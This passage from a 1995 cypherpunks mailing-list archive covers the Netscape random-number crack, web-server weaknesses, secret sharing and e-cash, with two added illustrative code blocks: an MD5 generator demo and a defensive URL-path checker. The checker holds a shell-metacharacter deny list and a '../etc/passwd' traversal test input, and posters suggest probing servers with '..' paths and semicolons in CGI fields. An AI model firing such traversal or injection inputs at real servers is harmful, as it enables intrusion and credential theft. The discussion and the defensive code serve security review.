Roy M. Silvernail --  roy@cybrspc.mn.org
  perl -e '$x = 1/20; print "Just my \$$x! (adjusted for inflation)\n"'
        "What do you mean, you've never been to Alpha Centauri?"
                                               -- Prostetnic Vogon Jeltz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF5kXBvikii9febJAQFu6QQAmA46r+MuUOprM/ETHPnzKVYWuc8vT22i
xqzgV5ScNLPe2fjSBlWtazT+e1xbj6MQKzHfqJUZztvRfpD4U3h7xptuf5WjRhlt
liHgrLvg9Nkq4azfQkS71ifW2cM4uZZpF0BrQsNxEsN5WiiYkBGFQCN8eRZ17s3i
GnU/FjZbiGc=
=o0wf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:09 PDT
To: Rick.Sciorra@hudson.lm.com
Subject: Re: Automatic E-Mail
Message-ID: <199509190929.CAA23985@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[This isn't quite on topic, though you could stretch it to
deal with remailers.  Can the winsock remailer do this?]

At 10:50 PM 9/18/95 GMT, Rick.Sciorra@hudson.lm.com wrote:
>Does anyone know of an E-Mail package that will automatically connect
>to the Internet and retrieve mail at specific intervals?

Sigh.  Folks have gotten too used to PC-market email systems,
which are generally braindamaged by having been around operating
systems where you can't just run a listener program that waits
for somebody to call you when they want to send you mail,
which of course fits in very well with letting ISPs avoid
having to make outgoing phone calls instead of just receiving,
plus the market reluctance of many of them to forward mail for you
to competing mail services and the client/server-orientation
that makes peer-to-peer services harder to implement.

Unix systems did this job just fine on PDP11/70s, which could
support a dozen or two users on a machine with about the
horsepower of a PC/AT.  And Henry Spencer could do that on a /44 :-)

Just about anything that does UUCP can be set to do that,
if you've got an ISP who doesn't charge you lots extra for
using UUCP.  Most high-end terminal emulation packages
have scripting languages that let you call up and do stuff,
which you should be able to call from timer programs;
you can probably even find a free Kermit version that will
do it.

I use Eudora Light with Trumpet to call Netcom's newbie-friendly
Netcruiser service; when I hit the menu item for send or retrieve
mail, it pops through all the layers and dials, and hangs up when it's done.
If Commercial Eudora can't already do that automagically, it should - 
ask Qualcomm to add it to the next version...  Alternatively, Winsock
programming isn't really all that hard, and POP3 is a pretty simple
protocol, so you could roll your own.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:11 PDT
To: cypherpunks@toad.com
Subject: Re: MIME attachments and ranting.
Message-ID: <199509190929.CAA23989@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
>> I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
>> it's worth saying, then *say* it.
>I really don't know why any mailers call a monopart MIME message an
>"attachment".

Mail readers come in three basic flavors of unMIMEificationness:
1) Ignorance+bliss - the mailer doesn't know or care about MIME headers,
   and you can ignore them when you read them, and may be able to configure
   the reader not to bother you with most of them (e.g. BSD Mail.)
3) Intelligence - the mailer does something genuinely useful to help you
   read the attachment, like letting you pop up some appropriate reading tool.
2) Naive friendliness - the Sirius Cybernetics approach.  "Your mail file has
   been tastefully shredded into little pieces and sprinkled around your disk
   drive.  Thank you for making a humble mail system so _very_ happy."  Free
   Eudora versions offer you several choices of tastefulness and shredditude,
   partly intended to provide artistic functionality and partly to encourage
   you to buy the commercial version which gives you a more flexible user
   interface for extensions like MIME.  So buy it, or cope with it, or tell
   Eudora to use your RAMdisk for its attachments where they'll soon go away
   and not bother you.

There's also another approach, typified by a vendor whose name will be omitted
but they'd know who they were if they had a <pejorative deleted> clue....

0) Downright hostile - Not only does it _pretend_ to be Intelligent, while
   only really doing the right thing with its own proprietary data formats*,
   though generally doing something reasonable with uuencoded documents with
   names that it understands, but it chokes and dies on messages that have
   even moderately large amounts of simple, basic, non-attachmentized _text_,
   and if you _do_ try to package text up to send to some poor sucker who's
   stuck with one of these <pejorative deleted> systems, it hands it to a 
   brain-damaged user-friendly mouse-editor that _also_ chokes on more than
   64KB of text....

[* where "the right thing" allows it to mindlessly run arbitrary code handed
to it as macros in the proprietary data formats that the company encourages its
users to use instead of real text....]

   
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:11 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <199509190929.CAA23992@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   The New York Times, September 19, 1995, pp. A1, D21.
> ......
>   "The good news and the bad news of the Internet is that
>   when you put something up there, many more people can test
>   it," said Mike Homer, the vice president of marketing at
>   Netscape. "You also give yourself the opportunity of having
>   people point things out which you can fix quickly."

That's a good, and realistic, attitude.

>   Netscape officials said today that they would strengthen
>   the system, by making it significantly harder to determine
>   the random number at the heart of their coding system. They
>   said they would no longer disclose what data would be used
>   to generate the random numbers.

I do hope this is just John Markoff's simplification of what Netscape's 
folks said and not an endorsement of security-by-obscurity.
I realize that some data does need to be kept around on disk
or in the program, since obtaining a lot of random bits at the beginning
of every transaction either requires annoying user interactions or
takes too long to get decent quality, and certainly this data
ought to be kept private by the algorithms involved.

One concern I've had about the popular "crunch some bits repeatedly
through MD5" approach to random number generation is that knowing
one sample from the stream (e.g. by doing a transaction with the victim)
gives you the rest of the stream.  There's a way to improve that.

        let X(0) be some number you keep around from a previous
                session, modified by whatever hardware randomness
                is available, and seeded by user input the first time.
        let X(i) = MD5(X(i-1))   
        let Y(i) = hash(X(i)), where hash is something like MD5(key,X(i))
        use Y(i) as the output random number.

This eliminates the ability to determine X(i) or Y(i+1) as a function of Y(i),
since the search space of X(i) is presumably too large to reverse (unlike
the number of bits you can cheaply get in one session).  Keeping some of the
bits of Y(i) around to use in addition to the other key for the hash, or to
key the MD5(X(i-1)) with, may be useful as well.

#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
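The two generators contrasted in the message above, as an added example that is
not part of the original message. MD5 is used only because the message names it,
hash(key, X) is taken to be MD5(key || X), and the seed and key are constructed
sample values rather than real entropy.

```python
import hashlib


def md5(*parts: bytes) -> bytes:
    """MD5 over the concatenation of the given byte strings."""
    h = hashlib.md5()
    for p in parts:
        h.update(p)
    return h.digest()


class ChainedGenerator:
    """'Crunch some bits repeatedly through MD5': the output IS the next state."""

    def __init__(self, seed: bytes):
        self.x = seed

    def next(self) -> bytes:
        self.x = md5(self.x)
        return self.x


class MaskedGenerator:
    """X(i) = MD5(X(i-1)); Y(i) = MD5(key || X(i)); only Y(i) is released."""

    def __init__(self, seed: bytes, key: bytes):
        self.x = seed
        self.key = key

    def next(self) -> bytes:
        self.x = md5(self.x)            # internal state, never output
        return md5(self.key, self.x)    # output reveals neither X(i) nor key


def predict_from_sample(sample: bytes, count: int) -> list:
    """What an observer computes from one output if output == internal state."""
    out, x = [], sample
    for _ in range(count):
        x = md5(x)
        out.append(x)
    return out


def demo():
    """Return (chained stream predicted?, masked stream predicted?)."""
    seed = b"constructed seed, not real entropy"
    key = b"constructed hash key"

    chained = ChainedGenerator(seed)
    observed = chained.next()                       # one value seen in a transaction
    future = [chained.next() for _ in range(3)]
    chained_predicted = predict_from_sample(observed, 3) == future

    masked = MaskedGenerator(seed, key)
    observed = masked.next()
    future = [masked.next() for _ in range(3)]
    masked_predicted = predict_from_sample(observed, 3) == future

    return chained_predicted, masked_predicted


if __name__ == "__main__":
    print(demo())
```

The masked generator is only as strong as the secrecy of X(0) and the key; anyone
holding both can reproduce every Y(i).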





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: Caribbean Internet Services? (fwd)
Message-ID: <199509190929.CAA23997@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:
>>> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>>> they were a few months ago.

The governments of the affected islands will have to make some tradeoffs -
do they allow providers of these services to operate freely, bringing in
new telecomm facilities so they can get the revenues from (let's keep the
Minnesota AG happy) gambling and other private-communications trade,
or do they leave their telecomm monopolies in place, so they can get the
telecomm revenues which get into government coffers more quickly?
Is there enough market to convince them to open up, which will attract
more services?  How much does being first matter?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:19 PDT
To: cypherpunks@toad.com
Subject: Re: Time release crypto
Message-ID: <199509190930.CAA24047@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>What minimal requirements would be needed to support encrypted packets/files
>>that a holder could only decrypt after a certain date/time?

Technology can't solve the problem, only help a bit; algorithms
aren't timebound.  In particular, true security depends on only
being able to decrypt if you have the correct information, and there's
no way to create decryption information in the future from 
encryption pieces you have now without being able to create the 
same information now.

Tim's 1993 article suggests spreading data around with 
> independent escrow agents who handle large volumes of messages
> and agree to hold them for various amounts of time. 
and depending on reputations and market forces to ensure honesty. 

> The decryption key to the original message is itself broken
> up into several or many pieces and scattered to a network of
> "remailer"-like agents (they are essentially "remailers into the future,"
> by agreeing as part of their protocol to hold messages for some amount of
> time).

What Tim almost, but not quite, mentions here is Shamir Secret Sharing -
you can split messages into N pieces, of which any M can reconstruct
the message and any M-1 don't contain enough information to resolve 
their equations uniquely, leaving you with _no_ known correct bits.

Tim's message also talked about having lots of data flowing around in 
a remailer-like fashion, but that may not be untraceable by subpoenas,
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:55:00 PDT
To: hacknetscape@c2.org
Subject: Fundamental Netscape hack
Message-ID: <199509190954.CAA24686@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Of course, one of the most serious security problems with Netscape servers
is that they run on machines sitting out there on the Internet where
anybody who can browse their services can attack them - that 128-bit
bullet-proof iron-clad front door isn't much help if the garage door is
unlocked because of some sendmail bug.  For most web applications,
the big security need is to send a chunk of encrypted data to some server
that will decrypt it and get your credit-card number or whatever,
but the standard SSL and S/HTTP protocols want to decrypt the data
to plaintext on the Web server before it can do anything like that.

(OK, I guess this doesn't win me a T-Shirt, since enough other people
have said similar things, but do I at least get a gif of the shirt
and a crayon so I can roll my own?  :-)  Good work, folks!
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 00:03:38 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <199509190703.DAA03247@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> I suspect that there are far more flaws in Netscape. String buffer
> overflows are another good guess here -- they are probably rampant
> through the code both for the browser and the commerce server they
> sell. I can't prove it myself, of course, given that I don't have the
> time to rip the thing apart, but the same folks never seemed to learn
> their lesson in release after release when they worked at NCSA, and
> the only thing that's probably keeping their dignity here is the lack
> of distributed source code.

  I doubt this in the case of the browser. At least as far as the
parsing is concerned. There may be a buffer overflow for example,
when you input the url in the "open" window, but that has to be
done manually by the user and isn't a threat, like a "rogue homepage"
would be. The reason I doubt string buffer overflows in the case of
the browser is that it seems to be written in some object oriented
language, perhaps C++ (or maybe just oo-C like BSAFE). Once you
have a general robust String class, you can prove it's non-overflowable,
and therefore no composition of operations from the browser code will
overflow it (unless of course, you break language safety by using
casts and pointer manipulation). Secondly, Netscape has been very
robust in my own testing against these common bugs. One of the things
I've done lately is "tiger team" attacks against servers and browsers.
(of course, sendmail is a brilliant counter example)
(if you can find a call to gets() in Netscape, I will instantly 
retreat ;-) )

  Netscape's security may be bad, but the rest of their browser, or at least
their development process, is good engineering. They've built a very
complex application, fairly quickly, that runs with very few bugs,
across a wide variety of operating systems and GUI's, while maintaining
a consistent user interface and feature set. Netscape 2.0 incorporated
Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't
expecting a Java capable Netscape until at least December). I'd like to
see Microsoft develop a piece of code that quickly that runs on
umpteen different flavors of Unix, MacOS, and Win3.1/95/NT. Hell, they
can't even write code that runs smoothly across all three
flavors of their operating system.

-Ray


 
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 00:34:36 PDT
To: sameer@c2.org (sameer)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190713.AAA01128@infinity.c2.org>
Message-ID: <199509190734.DAA09824@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > 
> >   I doubt this in the case of the browser. At least as far as the
> > parsing is concerned. There may be a buffer overflow for example,
> 
> 	Buffer overflow seems like a much greater concern when dealing
> with a server. Particularly one which is supposedly "secure", and
> accessing "secured" documents. Even with the server running as
> 'nobody' if someone can implement buffer overflow to get access to
> documents they shouldn't then that would count as a pretty significant
> hack.

   Right. Some other common ones are ".." and shell meta characters
in paths. Also, accessing files that you don't have permissions
to. Even if the server is perfect, the setup could be bad. For
instance, if you use CERN's Authentication scheme for protecting
URL hierarchies, do not put the passwd/group file within the
hierarchy. I've noticed this before on some servers, like

http://www.isp.com/company1/passwd   contains the passwd file for the
http://www.isp.com/company1/   URL directory. Although it is convenient
to store the passwd file within the hierarchy it is protecting, care
must be taken to make it unreadable by normal HTTP requests. It's better 
to put it in a configuration directory somewhere where no server
has access to. (I've seen this mistake plenty of times)

  A bare-bones web server is a pretty simple piece of software compared
to a browser (or sendmail), so it should be possible to make them
much more secure.

-Ray
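
The checks described in the message above, as an added example (not code from Ray Cromwell's post or from any server mentioned in the thread): a URL-to-file mapping that rejects ".." segments and shell metacharacters and never serves the passwd/group files, plus an audit for the misplaced-passwd mistake. The document root, function names and sample listing are assumptions; symbolic links are outside what this sketch checks.

```python
"""URL path handling for a document tree protected by passwd/group files.
Added illustration; every name here is hypothetical."""
import posixpath
from urllib.parse import unquote

AUTH_FILES = {"passwd", "group"}            # the files named in the message
SHELL_META = set(";|&`$<>\\\"'*?(){}[]!\n\r")


class Forbidden(Exception):
    """Raised when a request must not be mapped to a file."""


def resolve(docroot, url_path):
    """Map a request path to a file under docroot or raise Forbidden."""
    path = unquote(url_path.split("?", 1)[0])   # decode once, then check
    if not path.startswith("/"):
        raise Forbidden("not an absolute URL path")
    if "\x00" in path or any(ch in SHELL_META for ch in path):
        raise Forbidden("shell metacharacter or NUL in path")
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if ".." in segments:
        raise Forbidden("'..' segment")
    if any(s.lower() in AUTH_FILES for s in segments):
        raise Forbidden("authentication file requested")
    root = posixpath.normpath(docroot)
    full = posixpath.normpath(posixpath.join(root, *segments))
    # Defence in depth: the result must still sit inside the root.
    if full != root and not full.startswith(root + "/"):
        raise Forbidden("escapes document root")
    return full


def is_served(docroot, url_path):
    """True if the request would be mapped to a file, False if refused."""
    try:
        resolve(docroot, url_path)
    except Forbidden:
        return False
    return True


def audit_tree(relative_paths):
    """Return the auth files that were stored inside the served tree."""
    return [p for p in relative_paths
            if posixpath.basename(p).lower() in AUTH_FILES]


if __name__ == "__main__":
    root = "/srv/www"                                   # assumed docroot
    for req in ("/company1/index.html", "/company1/passwd",
                "/company1/%2e%2e/%2e%2e/etc/passwd", "/docs/report;v2"):
        print(req, "->", "served" if is_served(root, req) else "refused")
    listing = ["company1/index.html", "company1/passwd",   # constructed
               "company2/group", "company2/logo.gif"]
    print("move out of the tree:", audit_tree(listing))
```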




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 18 Sep 95 21:40:47 PDT
To: jlasser@rwd.goucher.edu (Jon Lasser)
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <Pine.SUN.3.91.950919000335.1167A-100000@rwd.goucher.edu>
Message-ID: <m0suuTF-000LjWC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 18 Sep 95 23:14:45 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <199509190604.BAA10003@arnet.arn.net>
Message-ID: <m0suvwi-000DMsC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> At 04:39 AM 9/19/95 +0000, you "wrote":
> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
> >
> 
> I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
> it's worth saying, then *say* it.

I really don't know why any mailers call a monopart MIME message an
"attachment".

In that message, I suggested that the list be gated to the new hierarchy
crypto.cypherpunks for the convenience of netnews without the visibility
of Usenet, and offered to run a gateway on news.tembel.org.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:00:23 PDT
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509191349.JAA04365@homeport.org>
Message-ID: <199509191355.GAA26932@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	Don't forget system(), which was a major source of holes in the NCSA server.  
> Also, CGI scripts, especially those that run under perl or sh, would be a good 
> place to look for holes.  Don't forget to see what happens when you put 
> semi-colons in the data field of various fields, such as mailto:'s.
> 

	A CGI-script hole doesn't count as a netscape server hole.
system() is probably pretty bad though. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:08:27 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: NYT on Netscape Crack
In-Reply-To: <28592.9509191106@exe.dcs.exeter.ac.uk>
Message-ID: <199509191403.HAA27655@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Sure that's hard to notice, but what you describe was an accident, ie
> the code wasn't working as you thought it was.
> 

	Also, the fact that the source isn't available meant that it
took quite some work to reveal the hole. In Eric's case, with
available source, his mistake was found and corrected.

> 
> The moral in netscape's story is that closed systems are bad news.
> These things ideally need open review.  And of course designing things
> with the expectation that they are secure with the *given* that the
> full algorithm is known.

	Yes.

> 
> Real shame because the rest of the software is very innovative
> compared to other browsers, and apparently good quality.  Also may be
> a set back for net commerce, which is bad news.
> 

	Well if we hammer at 'em enough maybe they'll get their
security fixed. I still use netscape. I'm not going to stop using
netscape. (I'm not going to use netscape for anything sensitive
though, that's for sure.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:40:31 PDT
To: cypherpunks@toad.com
Subject: articles
Message-ID: <199509191435.HAA00275@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	If you could, please send me the name of the reporter and
contact information for any articles you see regarding the netscape
hack.

Thanks,
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 19 Sep 95 05:40:36 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <43lu3k$7q6@tera.mcom.com>
Message-ID: <9509191238.AA09042@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
 > >   Sigh.  For your information the security code for 1.x versions of
 > > netscape was not even written by someone from NCSA.  The current
 > > security team (which does not include the person who did the 1.x
 > > version) also does not include anyone from NCSA.  While I can't
 > 
 > I will defend Netscape's code on the point about the RNG even though I 
 > have not seen any.  I assume the Netscape code is quite large and each 
 > release would have to pass various functionality tests.  How can you test 
 > that the RND seeding is wrong?

The seeding isn't "wrong"; it's a design flaw.  (At least that's my
understanding; maybe I missed something.)

 > You have to actually look at the code, the numbers coming out are
 > still random.

Two words: "design review".

 > This sort of error can only be checked by reading the code and
 > specifically looking at critical routines like this the RNG seeding
 > routines.

Uhh... OK.  Sounds like a plan to me.  For critical pieces of code
like that, having repeated exhaustive design/implementation reviews
should be a matter of course.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:44:49 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Fundamental Netscape hack
In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com>
Message-ID: <199509191439.HAA00501@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> (OK, I guess this doesn't win me a T-Shirt, since enough other people
> have said similar things, but do I at least get a gif of the shirt
> and a crayon so I can roll my own?  :-)  Good work, folks!

	GIFs of the shirt will be available on the web page as soon as
they are designed. (Times like these make me wish I owned a mac.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 19 Sep 95 07:44:14 PDT
To: tcmay@got.net
Subject: Re: Caribbean Internet Services?
Message-ID: <9509191440.AA13167@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> (Yes, there have been more hurricanes this year than in most years...not
> clear if it's just a Poisson fluctuation, or symptomatic of deeper weather
> pattern changes.)
> 
See September 95 Popular Science, article, "Hurricane Alert" in which the
world's leading hurricane scientist says that we're only just seeing the
beginning of several years of large numbers of large hurricanes.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Tue, 19 Sep 95 05:57:40 PDT
To: cypherpunks@toad.com
Subject: Errors in Applied Cryptography, 2nd Edition
Message-ID: <199509191257.HAA09502@icicle>
MIME-Version: 1.0
Content-Type: text



I have taken a three stage approach to reducing the number of
errors in the second edition:

     1.  Correct the errors from the first edition.
     2.  Ensure that I don't create any new errors while writing
          the new material for the second edition.
     3.  Make sure that additional errors don't creep in during
          the production of the second edition.

In order....  I have done a lot more than incorporate all the
corrections from the errata into the second edition.  Minor
things, too trivial to make the errata list, were also corrected. 
The first edition was translated into French, and the translator
sent me hundreds of queries: things that were unclear, ambiguous,
or erroneous.  All of those queries resulted in changes to the
second-edition manuscript.

I was a lot more careful adding new material, reading it over
several times to ensure accuracy.  And a lot of other people read
the chapters over, too.  For the first edition, I asked about a
dozen people to proofread the manuscript for me.  Most people
read the first chapters carefully, and then petered out somewhere
in the middle.  This time I asked about seventy people to each
read a chapter (or two)--a chapter within their area of
expertise.  Each chapter was edited by at least two people, often
more.  Additionally, two people were paid to read the entire book
for accuracy and comprehensibility.

I learned a lot about the publishing process during the
production of the first edition.  For the first edition, I had no
control of any of the production decisions.  The copyeditor added
errors to the manuscript.  Some computer idiot lost all of my
italics, boldface, superscripting, and subscripting while
translating my files from my word processor to their page layout
program.  The proofreader didn't catch errors that the production
people added.  I had almost no time to review the manuscript at
any of the stages.  This time around I was able to choose my own
copyeditor, proofreader, and indexer.  In fact, there were two
separate rounds of copyediting with two different copyeditors. 
The proofreader is not only the most meticulous proofreader I
know, but someone who knows enough math to catch errors in the
equations.  I verified all file translations myself.  And I
reviewed the copyedited manuscript twice, and two separate passes
of page proofs.

I'm not stupid enough to state that the book is 100% error-free,
but I am confident that there are far fewer errors in the second
edition than there were in the first.  I was embarrassed at some
of the errors in the first edition, and I put a lot of effort
into making sure it doesn't happen again.

Bruce

**************************************************************************
* Bruce Schneier
* Counterpane Systems         For a good prime, call 391581 * 2^216193 - 1
* schneier@counterpane.com
**************************************************************************



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 19 Sep 95 01:14:28 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <43lu3k$7q6@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509190355.XAA01329@frankenstein.piermont.com>, perry@piermont.com (Perry E. Metzger) writes:
> 
> Markoff's article in the Times says:
> >    Netscape officials said today that they would strengthen
> >    the system, by making it significantly harder to determine
> >    the random number at the heart of their coding system. They
> >    said they would no longer disclose what data would be used
> >    to generate the random numbers.
> 
> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how its done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

  Regardless of what Markoff implies, we do not intend to depend on
security through obscurity.

> I suspect that there are far more flaws in Netscape. String buffer
> overflows are another good guess here -- they are probably rampant
> through the code both for the browser and the commerce server they
> sell. I can't prove it myself, of course, given that I don't have the
> time to rip the thing apart, but the same folks never seemed to learn
> their lesson in release after release when they worked at NCSA, and
> the only thing that's probably keeping their dignity here is the lack
> of distributed source code.

  Sigh.  For your information the security code for 1.x versions of
netscape was not even written by someone from NCSA.  The current
security team (which does not include the person who did the 1.x
version) also does not include anyone from NCSA.  While I can't
guarantee that such buffer overflow errors don't exist in our
current products since I have not personally examined every line
of code, your generalization from experience with mosaic is bogus.
In the places in the code that I have seen where it looked like such
errors could have crept in, I have found that the correct checks
for buffer overflow have been in place.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 19 Sep 95 05:38:15 PDT
To: cypherpunks@toad.com
Subject: Re: taxonomies of 'real money' and e-cash
In-Reply-To: <Pine.3.89.9509190824.C29439-0100000@wane3.scri.fsu.edu>
Message-ID: <Pine.3.89.9509190811.D29503-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On the 18th, Tim May wrote:
> 
> I wasn't saying they are all on the same footing, or are all separate and
> compartmentalizable things. Clearly some of them are just slightly
> different "flavors" of other things. I listed a bunch of them not as a
> taxonomy or ontology, but as an illustration that there are many kinds of
> financial dealings, many kinds of roles played.
> 
> That the real world has so many flavors of financial things could of course
> be due to inertia and ignorance, partly. But there are also different
> functionalities, and costs. Fitting the different needs, the different
> roles of the players. I won't go on and on, as my last post on this I think
> hit the main points, but consider how many flavors we have just of
> "checks": the "ordinary" checks we write, counter checks, dual-endorser
> checks, traveller's checks, and so on. (If you are arguing that only
> "digital cash" is a real issue, and all other constructs are "small matters
> of programming," then we disagree profoundly.)

My mistake then.  You obviously have in mind some things much more subtle 
and more logically removed from money, or currency, or even liquidity 
than what I thought you were referring to.  I'm going back to reading the 
list in the mornings.

--PJ

 . . . .

> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 09:01:41 PDT
